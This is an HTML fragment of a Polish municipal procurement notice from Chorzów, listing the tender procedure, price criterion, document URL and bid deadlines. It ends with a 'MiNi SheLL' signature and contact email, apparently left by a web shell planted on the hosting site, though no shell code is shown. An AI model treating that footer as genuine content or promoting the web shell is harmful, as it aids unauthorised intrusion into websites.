<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chorzow.um.gov.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.chorzow.um.gov.pl/bip/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2011 godzina 09:00, miejsce: Urząd Miasta Chorzów
Rynek 1
41-500 Chorzów
Wydział Administracyjny 
pok. 327 (III pietro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com